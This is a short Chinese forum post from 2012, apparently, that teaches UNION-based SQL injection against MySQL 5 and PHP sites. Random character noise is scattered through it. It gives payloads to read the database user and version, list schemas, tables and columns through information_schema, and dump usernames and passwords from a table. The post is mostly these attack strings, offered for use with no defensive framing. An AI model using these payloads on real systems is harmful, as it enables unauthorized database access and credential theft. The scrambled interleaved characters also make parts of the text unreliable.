! j& r1 D( T8 T3 G' E: d% J教程内容:Mysql 5+php 注入 Z3 \* e. K% G# ?! O* a3 u
}. F' q3 d3 ~+ t
* y8 X1 C! i3 J) M+ z4 p t7 ~5 r$ q, L L- y9 t7 ]$ z9 R
一.查看MYSQL基本信息(库名,版本,用户)7 C: _$ y, s8 ]$ J& f' z6 S# J
$ i k* j0 K" v5 r: e# }0 }- u$ S
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
0 J p' \& m. c" i4 I6 ]+ p# ]2 l9 p" E/ o- O
二.查数据库+ a1 b1 [& k) ~, |, _7 |
- L6 J" c Q S% qand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*# t [2 O; |( _# B) i
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。# I3 u* W, _, J8 y! R
7 B/ Z3 s% k8 t) v6 Y三.暴表
2 }' c( h( h; w! F# m/ ^$ W9 p2 D2 N, A; a. Q
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*3 ^& b4 q8 r. h9 X( z. g& M2 \5 _
. l: U% R- w- B8 p. {9 llimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。$ j6 Q( Y2 i, k8 `" e
, a- P5 R( Q0 u2 H
四.暴字段 X2 \8 r8 K, G6 N
: \; F3 r B& U- ^and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/* }9 q& b0 D7 Y
+ U4 V b, T- S1 A0 Q. Blimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
; s! r0 G$ _9 g" I0 d* G7 U! T5 n
+ d6 f2 y# ?+ [( P g五.暴数据
/ I& C8 V b9 s
, L; Z5 L. b/ p" q+ s6 I/ r8 Oand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
$ W' |! t. {* i3 w5 m
1 T' h L s2 j$ \( h. d( k) U
) `5 ^' T' x9 k8 f$ V1 p& Z这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
$ a2 Y/ y0 B3 D& s7 o |
发表于 2012-9-13 16:27:53
收藏
支持
反对